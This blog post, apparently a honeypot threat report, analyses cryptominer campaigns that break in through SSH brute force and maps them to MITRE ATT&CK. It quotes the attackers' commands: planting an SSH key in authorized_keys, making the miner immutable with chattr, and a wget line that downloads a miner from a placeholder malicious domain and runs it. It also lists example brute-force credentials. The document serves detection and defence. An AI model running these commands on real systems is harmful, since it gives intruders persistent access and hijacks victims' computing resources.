Blog

Attack Observation Report: Analysis of Cryptominer Activity

Attack Observation Report: Analysis of Cryptominer Activity

Executive Summary

This report examines the crypto miner activity detected on the Digital Ocean based [1]DShield honeypot, breaking down the attackers' attack patterns, techniques, and payloads. This analysis also maps relevant [2]MITRE ATT&CK techniques, providing a clear view of the adversaries' strategies.

1. Overview of Cryptominer Activity

  • Total Attacks Involving Cryptominers: 8 distinct sessions
  • Key Payloads:
    • miner.r002c0dgm24/xmrig (ELF binaries for various architectures)
    • miner.yknqn (Used for persistent cryptocurrency mining)
    • setup.sh and clean.sh (Scripts for deploying and hiding the miner)

2. Attack Vectors and Techniques

Attackers used SSH brute-force attacks to break into the honeypot, exploiting weak or common passwords. Once inside, they quickly moved to install crypto mining software, which hijacks the server's CPU resources to mine cryptocurrency. Below, we break down the stages of the attack, aligning them with MITRE ATT&CK techniques where relevant.

2.1. Initial Access (ATT&CK T1078: Valid Accounts)

The attackers primarily accessed the server by brute-forcing SSH, targeting weak or default passwords with automated SSH attacks, where attackers rotate through a list of known username-password pairs. This highlights the critical need for strong password policies and securing SSH services.

  • Example Credentials Used:
    • root:abcd1234@
    • opc:opc
    • wp-user:123

2.2. Execution (ATT&CK T1059.004: Command and Scripting Interpreter: Unix Shell)

After gaining access, the attackers ran several commands to prepare the environment for crypto mining. This included disabling security measures, removing competing processes, and setting up the system for long-term exploitation.

  • Key Commands:
    • cd ~; chattr -ia .ssh; lockr -ia .ssh – Unlock and lock SSH configurations.
    • rm -rf .ssh && mkdir .ssh – Clear out existing authorized keys and insert the attacker's key.

2.3. Persistence (ATT&CK T1098: Account Manipulation)

The attackers modified SSH configurations to maintain control, particularly the .ssh/authorized_keys file, ensuring they could regain access even if the root password was changed.

  • Key Commands:
    • echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvc">>.ssh/authorized_keys && chmod -R go= ~/.ssh – Adds the attacker's SSH key to ensure persistent access.

2.4. Defense Evasion (ATT&CK T1222: File and Directory Permissions Modification)

To avoid detection and make removal difficult, the attackers used chattr to make critical files immutable.

  • Key Commands:
    • chattr +i /tmp/miner – Makes the miner binary immutable, preventing it from being deleted or modified.

2.5. Impact (ATT&CK T1496: Resource Hijacking)

The primary consequence of these attacks was resource hijacking. The crypto miners consumed significant CPU resources, which degraded legitimate services' performance and potentially raised operational costs.

  • Key Commands:
    • nohup /tmp/miner & – Runs the miner in the background, continuously using CPU resources for cryptocurrency mining.

3. Detailed Analysis of Cryptominer Payloads

3.1. Miner redtail.arm7

  • SHA-256 Hash: [3]66354c8878ca935f0fc6e3623e190e8a400318ded4c8d3d7baa85873059bc179
  • Description:
    • This ELF binary targets ARMv7 architectures, meaning it can exploit a wide range of devices, from tiny IoT gadgets to cloud servers.
    • The miner connects to a mining pool, contributing hash power to mine cryptocurrency, typically Monero (XMR).

3.2. Miner redtail.x86_64

  • SHA-256 Hash: [4]17229e1940e272030b079915600ea9fd944b8250680d89e1ee1eca42bbe3772f
  • Description:
    • Designed for 64-bit x86 architectures, this miner is ideal for exploiting cloud servers and high-performance systems.
    • Deploying architecture-specific binaries shows the attackers' focus on maximizing resource exploitation.

3.3. Associated Shell Scripts

  • Setup and Clean-Up Scripts:
    • [5]setup.sh and [6]clean.sh scripts were used to deploy and hide the miner binaries effectively. These scripts automate the system preparation, disable security features, and ensure persistence.

Example Command:

wget http://<malicious domain>/redtail.x86_64 -O /tmp/miner && chmod +x /tmp/miner && /tmp/miner

4. MITRE ATT&CK Mapping

The tactics and techniques observed in this crypto miner campaign can be mapped to the following MITRE ATT&CK techniques:

  • Initial Access: T1078 - Valid Accounts
  • Execution: T1059.004 - Command and Scripting Interpreter: Unix Shell
  • Persistence: T1098 - Account Manipulation
  • Defense Evasion: T1222 - File and Directory Permissions Modification
  • Impact: T1496 - Resource Hijacking

5. Impact Assessment

Resource Utilization:

  • The crypto miners significantly increased CPU usage, leading to degraded system performance. This could mean higher costs in cloud environments due to increased resource consumption.

Operational Costs:

  • Continuous mining could result in unexpected financial costs for the victim, especially in cloud environments where resource usage is billed based on consumption.

System Stability:

  • Crypto miners could destabilize the system by consuming resources needed by legitimate applications, potentially causing downtime or degraded service availability.

Persistence and Evasion:

  • The use of file immutability (chattr +i) and automated deployment scripts (setup.sh) reflects a sophisticated approach to maintaining persistence and evading detection, making incident response more challenging.

6. Recommendations for Mitigation

  • Strengthen SSH Security:
    • Enforce strong, unique passwords and disable password-based authentication in favor of SSH keys.
    • Implement Multi-Factor Authentication (MFA) to add an extra layer of security to SSH access.
  • Network and System Monitoring:
    • Deploy network-based intrusion detection systems (NIDS) to monitor outbound traffic for connections to known mining pools or suspicious IP addresses.
    • Monitor CPU usage for unusual spikes, which could indicate crypto miner activity.

Conclusion

The detected crypto miner activity illustrates the ongoing threat of resource hijacking in cloud environments. Attackers exploited weak SSH credentials to gain access, deployed customized crypto miner payloads, and implemented persistence measures to avoid detection. These attacks can lead to significant financial and operational impacts, including higher costs and reduced system performance.

References

[1] DShield Honeypot

[2] MITRE ATT&CK

[3] redtail.arm7

[4] redtail.x86_64

[5] setup.sh

[6] clean.sh

Follow my journey